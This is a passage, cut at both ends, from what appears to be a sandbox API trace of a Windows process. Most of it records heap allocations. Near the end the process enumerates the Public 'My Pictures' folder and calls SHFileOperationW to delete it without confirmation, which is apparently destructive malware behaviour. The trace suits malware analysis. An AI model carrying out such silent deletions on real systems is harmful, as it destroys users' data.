lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0267.491] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0267.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0267.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0267.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0267.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.497] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0267.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4c) returned 0x240a4d0 [0267.498] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Pictures", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\Public\\Documents\\My Pictures", lpFilePart=0x8bedfc*="My Pictures") returned 0x25 [0267.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0267.498] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures" (normalized: "c:\\users\\public\\documents\\my pictures")) returned 0x2416 [0267.498] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x246d870, ftCreationTime.dwLowDateTime=0x4a82e4, ftCreationTime.dwHighDateTime=0x246d860, ftLastAccessTime.dwLowDateTime=0x246d858, ftLastAccessTime.dwHighDateTime=0x8bf054, ftLastWriteTime.dwLowDateTime=0x76c314dd, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x74f605ba, nFileSizeLow=0x0, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="", cAlternateFileName="\x519\x77aa\xf1fc\x8b\x2451\x02\xff78\x8b\x1ecd\x771a\x25b9\x34\xfffe\xffff\x5c\x55\x73\x65\x72\x73\x5c\x50\x75\x62\x6c\x69\x63\x5c\x44\x6f\x63\x75\x6d\x65\x6e\x74\x73\x5c\x4d\x79\x20\x50\x69\x63\x74\x75\x72\x65\x73\x5c")) returned 0xffffffff [0267.498] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0267.498] GetLastError () returned 0x6 [0267.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0267.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.499] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0267.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0267.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0267.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0267.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0267.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4c) returned 0x240a4d0 [0267.500] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Pictures", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Pictures", lpFilePart=0x8bf658*="My Pictures") returned 0x25 [0267.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0267.500] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures" (normalized: "c:\\users\\public\\documents\\my pictures")) returned 0x2416 [0267.501] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\x